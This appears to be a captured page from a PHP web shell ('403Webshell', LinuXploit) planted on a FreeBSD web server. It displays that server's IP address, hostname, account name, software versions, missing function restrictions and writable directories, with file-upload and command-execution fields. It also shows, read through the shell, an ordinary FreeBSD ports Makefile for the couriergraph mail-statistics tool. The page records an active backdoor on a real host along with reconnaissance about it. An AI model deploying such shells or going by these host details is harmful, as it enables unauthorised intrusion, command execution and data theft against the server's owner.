403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/mail/couriergraph/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/mail/couriergraph/Makefile
PORTNAME=	couriergraph
PORTVERSION=	20060202
PORTREVISION=	6
CATEGORIES=	mail
MASTER_SITES=	http://www.arschkrebs.de/postfix/${PORTNAME}/
DISTNAME=	${PORTNAME}

MAINTAINER=	ports@FreeBSD.org
COMMENT=	RRDtool frontend for Courier statistics
WWW=		https://www.arschkrebs.de/postfix/couriergraph/

RUN_DEPENDS=	rrdtool>=0:databases/rrdtool \
		p5-File-Tail>=0:devel/p5-File-Tail

USES=		perl5 shebangfix
USE_PERL5=	run
SHEBANG_FILES=	couriergraph.cgi couriergraph.pl
USE_RC_SUBR=	${PORTNAME}
NO_BUILD=	yes
WRKSRC=		${WRKDIR}/${PORTNAME}-${PORTVERSION}

DATADIR?=	/var/db/couriergraph
COURIERGRAPH_USER?=	${WWWOWN}
COURIERGRAPH_GROUP?=	${WWWGRP}

PLIST_SUB=	COURIERGRAPH_USER=${COURIERGRAPH_USER} \
		COURIERGRAPH_GROUP=${COURIERGRAPH_GROUP}
SUB_LIST=	COURIERGRAPH_USER=${COURIERGRAPH_USER} \
		COURIERGRAPH_GROUP=${COURIERGRAPH_GROUP}
STARTUP_FILE=	${PREFIX}/etc/rc.d/couriergraph.sh

SUB_FILES=	pkg-message

pre-everything::
	@${ECHO_MSG}
	@${ECHO_MSG} "You may set the following options:"
	@${ECHO_MSG}
	@${ECHO_MSG} "DATADIR=/var/db/couriergraph	Where do you put RRD databases?"
	@${ECHO_MSG} "COURIERGRAPH_USER=www		User to run couriergraph (default: ${WWWOWN})"
	@${ECHO_MSG} "COURIERGRAPH_GROUP=www		Group to run couriergraph (default: ${WWWGRP})"
	@${ECHO_MSG}

# To avoid conflict between default WRKSRC and RC_SUBR file being the same
post-extract:
	@${MV} ${WRKDIR}/${PORTNAME} ${WRKSRC}

post-patch:
	@${REINPLACE_CMD} -e "s,%%DATADIR%%,${DATADIR}," \
		${WRKSRC}/couriergraph.cgi ${WRKSRC}/couriergraph.pl

do-install:
	@${MKDIR} ${STAGEDIR}${PREFIX}/www/cgi-bin
	@${MKDIR} ${STAGEDIR}${DATADIR}
	${INSTALL_SCRIPT} ${WRKSRC}/couriergraph.pl \
		${STAGEDIR}${PREFIX}/sbin
	${INSTALL_SCRIPT} ${WRKSRC}/couriergraph.cgi \
		${STAGEDIR}${PREFIX}/www/cgi-bin

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit